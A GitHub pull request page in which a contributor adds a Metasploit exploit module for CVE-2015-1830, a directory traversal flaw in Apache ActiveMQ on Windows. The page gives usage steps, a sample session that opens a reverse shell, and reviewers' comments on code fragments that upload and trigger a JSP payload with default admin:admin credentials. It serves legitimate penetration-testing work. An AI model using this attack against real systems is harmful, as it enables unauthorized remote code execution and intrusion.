Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add apache_activemq_traversal_upload module to /modules/exploits/windows/http/ #12910

Merged
merged 5 commits into from Mar 5, 2020

Conversation

@kalba-security
Copy link
Contributor

kalba-security commented Feb 4, 2020

About

This change adds a new module to /modules/exploits/windows/http/ that can be used to exploit a directory traversal vulnerability (CVE-2015-1830) in Apache ActiveMQ 5.x before 5.11.2 for Windows. The change also adds documentation for this module. For more information about this vulnerability, please check the documentation file or https://www.cvedetails.com/cve/CVE-2015-1830/.

Vulnerable System

Apache ActiveMQ 5.x before 5.11.2 for Windows.

Verification Steps

  1. Install the module as usual
  2. Start msfconsole
  3. Do: use exploit/windows/http/apache_activemq_traversal_upload
  4. Do: set RHOSTS [IP]
  5. Do: set payload [payload]
  6. Do: set LHOST [IP]
  7. Do: exploit

Options

  1. PASSWORD. The default setting is admin.
  2. PATH. This option is the traversal path. /fileserver/..\admin\ by default.
  3. Proxies. This option is not set by default.
  4. RHOSTS. To use: set RHOSTS [IP]
  5. RPORT. The default setting is 8161. To use: set RPORT [PORT]
  6. SSL. The default setting is false.
  7. THREADS. The default setting is 1.
  8. USERNAME. The default setting is admin.
  9. VHOST. This option is not set by default.
  10. TARGETURI. This option is the base path. / by default.

Compatible Payloads

  1. generic/custom
  2. generic/shell_bind_tcp
  3. generic/shell_reverse_tcp
  4. java/jsp_shell_bind_tcp
  5. java/jsp_shell_reverse_tcp

Payload Options

  1. LHOST. To use: set LHOST [IP]
  2. LPORT. The default setting is 4444. To use: set LPORT [PORT]
  3. SHELL. This option is not set by default.

Scenarios

msf5 exploit(windows/http/apache_activemq_traversal_upload) > show options

Module options (exploit/windows/http/apache_activemq_traversal_upload):

   Name       Current Setting        Required  Description
   ----       ---------------        --------  -----------
   PASSWORD   admin                  yes       Password to authenticate with
   PATH       /fileserver/..\admin\  yes       Traversal path
   Proxies                           no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.1.2            yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      8161                   yes       The target port (TCP)
   SSL        false                  no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                      yes       The base path to the web application
   USERNAME   admin                  yes       Username to authenticate with
   VHOST                             no        HTTP server virtual host


Payload options (java/jsp_shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.1      yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port
   SHELL                   no        The system shell to use.


msf5 exploit(windows/http/apache_activemq_traversal_upload) > exploit

[*] Started reverse TCP handler on 192.168.1.1:4444 
[*] Uploading payload...
[*] Payload sent. Attempting to execute the payload.
[*] Payload executed!
[*] Command shell session 1 opened (192.168.1.1:4444 -> 192.168.1.2:49194) at 2020-02-04 10:55:36 +0100

Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\IEUser\Desktop\activemq 5.11.1\apache-activemq-5.11.1\bin\win64>
@kalba-security

This comment has been minimized.

Copy link
Contributor Author

kalba-security commented Feb 5, 2020

Hey FYI, vulnerable activemq versions for testing can be downloaded from https://activemq.apache.org/download-archives. Installing one of those and testing the module should be rather quick.

@dwelch-r7 dwelch-r7 self-assigned this Feb 28, 2020
end

def check
print_status("loaded check")

This comment has been minimized.

Copy link
@cbrnrd

cbrnrd Feb 28, 2020

Contributor

This is unnecessary. If the user wants to run check, they know its running/loaded

[
[ 'Windows Java',
{
'Arch' => ARCH_JAVA,

This comment has been minimized.

Copy link
@cbrnrd

cbrnrd Feb 28, 2020

Contributor

I know this is JSP, but does it actually affect the JRE running on the server? Not really sure if this is completely necessary.

This comment has been minimized.

Copy link
@dwelch-r7

dwelch-r7 Feb 28, 2020

Contributor

The Arch affects what payloads are available to be selected when running the module, this looks like the right choice


def initialize(info = {})
super(update_info(info,
'Name' => 'Apache ActiveMQ directory traversal shell upload',

This comment has been minimized.

Copy link
@cbrnrd

cbrnrd Feb 28, 2020

Contributor
Suggested change
'Name' => 'Apache ActiveMQ directory traversal shell upload',
'Name' => 'Apache ActiveMQ Directory Traversal Shell Upload',

This comment has been minimized.

Copy link
@cbrnrd

cbrnrd Feb 28, 2020

Contributor

Also specify a version of Apache ActiveMQ if possible


def exploit
print_status("Uploading payload...")
testurl = Rex::Text::rand_text_alpha(10)

This comment has been minimized.

Copy link
@cbrnrd

cbrnrd Feb 28, 2020

Contributor

This variable name is kind of misleading as it's the filename, not the url.

'Description' => %q{
This module exploits a directory traversal vulnerability (CVE-2015-1830) in Apache ActiveMQ 5.x before 5.11.2 for Windows. It tries to upload a JSP payload to the /admin directory via the traversal path /fileserver/..\\admin\\ using an HTTP PUT request with the default credentials admin:admin. It then issues an HTTP GET request to /admin/<payload>.jsp on the target in order to trigger the payload and obtain a shell.
},
'Author' => 'Erik Wynter', #@wyntererik

This comment has been minimized.

Copy link
@cbrnrd

cbrnrd Feb 28, 2020

Contributor

Did you discover the vulnerability or just write the module or both? Conventionally it is detailed in the comments.

3. Do: `use exploit/windows/http/apache_activemq_traversal_upload`
4. Do: `set RHOSTS [IP]`
5. Do: `set payload [payload]`
6. Do: `set LHOST [IP]`

This comment has been minimized.

Copy link
@cbrnrd

cbrnrd Feb 28, 2020

Contributor

Consistency:

4. Do: `set RHOSTS [IP]`
5. Do: `set PAYLOAD [payload]`
6. Do: `set LHOST [IP]`

or

4. Do: `set rhosts [IP]`
5. Do: `set payload [payload]`
6. Do: `set lhost [IP]`

## Verification Steps

1. Install the module as usual

This comment has been minimized.

Copy link
@cbrnrd

cbrnrd Feb 28, 2020

Contributor

This isn't necessary. If it's merged it will be included in the framework and won't have to be installed.

])
end

def check

This comment has been minimized.

Copy link
@cbrnrd

cbrnrd Feb 28, 2020

Contributor

Whitespace. This line should be indented 2 spaces and everything in the function should be adjusted accordingly.

res1 = send_request_cgi({
'uri' => normalize_uri(target_uri.path,"admin/#{testurl}.jsp"),
'headers' => {
'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])

This comment has been minimized.

Copy link
@cbrnrd

cbrnrd Feb 28, 2020

Contributor

Indent this 2 spaces

testurl = Rex::Text::rand_text_alpha(10)
vprint_status("If upload succeeds, payload will be available at #{target_uri.path}admin/#{testurl}.jsp") #This information is provided to allow for manual execution of the payload in case the upload is successful but the GET request issued by the module fails.

res = send_request_cgi({

This comment has been minimized.

Copy link
@cbrnrd

cbrnrd Feb 28, 2020

Contributor

This doesn't need to be saved as a variable if you're not referencing it

@dwelch-r7

This comment has been minimized.

Copy link
Contributor

dwelch-r7 commented Feb 28, 2020

Hey FYI, vulnerable activemq versions for testing can be downloaded from https://activemq.apache.org/download-archives. Installing one of those and testing the module should be rather quick.

Was able to test, works well, thanks for your contribution
Are you still interested in working on this PR with us?

@kalba-security

This comment has been minimized.

Copy link
Contributor Author

kalba-security commented Feb 28, 2020

Hey FYI, vulnerable activemq versions for testing can be downloaded from https://activemq.apache.org/download-archives. Installing one of those and testing the module should be rather quick.

Was able to test, works well, thanks for your contribution
Are you still interested in working on this PR with us?

Hey yeah sure! I'm glad it's finally being reviewed. I could commit all the issues mentioned so far on Monday or Tuesday. I won't have time before then unfortunately.
FYI I wrote only the module and will make sure to add a reference to the original exploit and it's author. Also, I'm pretty sure this exploit only works with Java payloads, but I could run some more tests.

@dwelch-r7

This comment has been minimized.

Copy link
Contributor

dwelch-r7 commented Mar 2, 2020

@kalba-security that sounds great thanks!

@kalba-security

This comment has been minimized.

Copy link
Contributor Author

kalba-security commented Mar 3, 2020

@dwelch-r7 I think this should cover all suggestions from the code review. Please let me know if I can help with anything else.


include Msf::Exploit::Remote::HttpClient

def initialize(info = {})
super(update_info(info,
'Name' => 'Apache ActiveMQ directory traversal shell upload',
'Name' => 'Apache ActiveMQ 5.x-5.11.1 Directory Traversal Shell Upload',
'Description' => %q{
This module exploits a directory traversal vulnerability (CVE-2015-1830) in Apache ActiveMQ 5.x before 5.11.2 for Windows. It tries to upload a JSP payload to the /admin directory via the traversal path /fileserver/..\\admin\\ using an HTTP PUT request with the default credentials admin:admin. It then issues an HTTP GET request to /admin/<payload>.jsp on the target in order to trigger the payload and obtain a shell.

This comment has been minimized.

Copy link
@dwelch-r7

dwelch-r7 Mar 4, 2020

Contributor

@kalba-security If you could just split this description up a bit I think that's the last thing and then I'd be good to land it

This comment has been minimized.

Copy link
@kalba-security

kalba-security Mar 4, 2020

Author Contributor

@kalba-security If you could just split this description up a bit I think that's the last thing and then I'd be good to land it

Done! @dwelch-r7

dwelch-r7 added a commit that referenced this pull request Mar 5, 2020
@dwelch-r7 dwelch-r7 merged commit 6338994 into rapid7:master Mar 5, 2020
3 checks passed
3 checks passed
Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Details
Metasploit Automation - Test Execution Successfully completed all tests.
Details
continuous-integration/travis-ci/pr The Travis CI build passed
Details
@dwelch-r7

This comment has been minimized.

Copy link
Contributor

dwelch-r7 commented Mar 5, 2020

Release Notes

This adds a module to exploit CVE-2015-1830, which is a directory traversal vulnerability in Apache Activemq on Windows. It works by uploading and then executing a JSP file.

@kalba-security kalba-security deleted the kalba-security:apache_activemq_traversal_upload branch Mar 6, 2020
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
Linked issues

Successfully merging this pull request may close these issues.

None yet

4 participants
You can’t perform that action at this time.